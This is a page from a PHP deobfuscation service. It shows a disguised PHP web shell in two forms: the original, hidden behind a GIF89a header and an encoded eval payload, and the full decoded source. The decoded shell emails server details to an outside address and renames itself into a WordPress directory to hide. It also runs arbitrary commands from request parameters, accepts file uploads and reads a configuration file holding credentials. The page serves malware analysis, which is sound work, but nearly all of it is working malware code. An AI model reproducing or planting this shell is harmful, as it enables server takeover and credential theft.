Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

GIF89a<?php $d='xRd4Qhu59jNV/IeDm9UkTZIJsFtIIW7bhWNOaiG9Vrj3A61TkxknZJkZj3lCUIr63/cceyaP0..

Decoded Output download

echo <<<html
<link rel="SHORTCUT ICON" href="http://www.zeroto60times.com/blog/wp-content/uploads/2013/02/ferrari-cars-logo-emblem.jpg">
<style type="text/css">
<!--
.send {font-family: "Courier New", Courier, monospace;border:none; font-size:18px; background-color:#FFFFFF; font-black:bold}
#Layer1 {
	position:absolute;
	left:200px;
	top:3px;
	width:800px;
	height:633px;
	z-index:1;
	margin-top: 3%;
	margin-right: 3%;
	right: 20%;
	bottom: auto;
	margin-bottom: 3%;
	margin-left: 3%;
	border: thin solid #0066CC;
	font-family:"Courier New", Courier, monospace;
	overflow: auto;
}
.style1 {
	color: #0000CC;
	font-weight: bold;
}
-->
</style>

<body>
<div id="Layer1"><br><br><table width="100%" border="0">
  <tr>
    <td><div align="center" class="style1"><blink>T E A M 2 4 H O U R S U N K N O W N </blink></div></td>
  </tr>
</table>

  <table width="100%" border="0" cellspacing="20">
    <tr>
      <td>
html;
?>
<?php
error_reporting(0);
if (!isset($_SESSION['bajak']))	{
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "ada yang inject 
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail('[email protected]', "$body","Hasil Bajakan http://$web$inj
$security
IP Server = $serper
 IP Injector= $injektor");
$_SESSION['bajak'] = 0;
}
else {$_SESSION['bajak']++;};
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/wp-includes/wp-simple.php";
rename($source, $desti);
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF";}
else {$security= "SAFE_MODE : ON";}
echo "<title>T E A M C O D E R</title><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br><b> Dir : ".getcwd()."</b><br>";
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
function exe($cmd) {
	if(function_exists('system')) { 		
		@ob_start(); 		
		@system($cmd); 		
		$buff = @ob_get_contents(); 		
		@ob_end_clean(); 		
		return $buff; 	
	} elseif(function_exists('exec')) { 		
		@exec($cmd,$results); 		
		$buff = ""; 		
		foreach($results as $result) { 			
			$buff .= $result; 		
		} return $buff; 	
	} elseif(function_exists('passthru')) { 		
		@ob_start(); 		
		@passthru($cmd); 		
		$buff = @ob_get_contents(); 		
		@ob_end_clean(); 		
		return $buff; 	
	} elseif(function_exists('shell_exec')) { 		
		$buff = @shell_exec($cmd); 		
		return $buff; 	
	} elseif (is_resource($f = @popen($cmd,"r"))) {
		$buff = "";
		while(!@feof($f))
			$buff .= fread($f,1024);
		pclose($f);
		return $buff;
	}
}
echo '<form method="POST" action=""><br><br><font size=2 color=#888888><b>Command : </b><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<br><br><form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File : </b></font><input type=hidden name="submit"><input type=file name="userfile" size=28><br><br><font size=2 color=#888888><b>New name : </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." :D "; }
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>".exe($cmd)."</font></pre>";
}
elseif(isset($_GET['cmd'])){
$comd = $_GET['cmd'];
echo "<pre><font size=3 color=#000000>".exe($comd)."</font></pre>";
}
elseif(isset($_GET['rf'])){
$rf = file_get_contents("../../configuration.php");
echo $rf;
}
else { echo "<pre><font size=3 color=#000000>".exe('ls -la')."</font></pre>";
}?>
<?
echo <<<footer
</td>
    </tr>
  </table>
</div>
</body>
footer;

Did this file decode correctly?

Original Code

GIF89a<?php
$d='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';
eval(gzinflate(str_rot13(base64_decode($d))));
?>

Function Calls

gzinflate 1
str_rot13 1
base64_decode 1

Variables

$d xRd4Qhu59jNV/IeDm9UkTZIJsFtIIW7bhWNOaiG9Vrj3A61TkxknZJkZj3lC..

Stats

MD5 4d53ab09d14e4ed28b5344fb26e1daae
Eval Count 1
Decode Time 76 ms